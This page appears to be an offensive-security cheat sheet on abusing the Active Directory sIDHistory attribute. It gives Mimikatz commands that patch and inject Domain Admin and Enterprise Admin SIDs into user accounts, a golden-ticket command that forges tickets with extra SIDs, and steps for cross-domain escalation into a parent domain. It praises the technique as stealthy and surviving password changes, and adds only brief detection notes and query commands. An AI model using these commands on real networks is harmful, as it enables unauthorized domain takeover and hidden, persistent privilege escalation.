Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Overview

sIDHistory attribute stores previous SIDs from domain migration. If Enterprise/Domain Admin SID injected → user gets those privileges transparently.

Inject SID History — Mimikatz

mimikatz # privilege::debug
mimikatz # sid::patch
mimikatz # sid::add /sam:targetuser /new:S-1-5-21-DOMAIN-SID-500

Add Enterprise Admins SID

mimikatz # sid::add /sam:targetuser /new:S-1-5-21-PARENT-DOMAIN-SID-519

Via Golden Ticket

Include extra SIDs in golden ticket: 
mimikatz # kerberos::golden /user:Administrator /domain:child.domain.local /sid:CHILD_SID /krbtgt:KRBTGT_HASH /sids:S-1-5-21-PARENT-SID-519 /ptt
-519 = Enterprise Admins.

Check SID History

Get-ADUser targetuser -Properties SIDHistory | Select SIDHistory

ldapsearch -x -H ldap://DC_IP -b "DC=domain,DC=local" "(sAMAccountName=targetuser)" sIDHistory

Cross-Domain Abuse

Inject parent domain’s Domain Admins SID into child domain user: 
mimikatz # sid::add /sam:childuser /new:S-1-5-21-PARENT-SID-512
Child domain user now has Domain Admin rights in parent domain.

Notes

  • Survives password changes
  • Works across domain trusts (if SID filtering not enabled)
  • Very stealthy — user appears normal
  • Detection: audit sIDHistory attribute changes
  • SID filtering blocks this across forest trusts

Quick Reference

TaskCommand
Inject SIDmimikatz # sid::add /sam:user /new:SID
Via Golden/sids:S-1-5-21-PARENT-519 in golden ticket
CheckGet-ADUser user -Properties SIDHistory
Enterprise Admin SID-519 from parent domain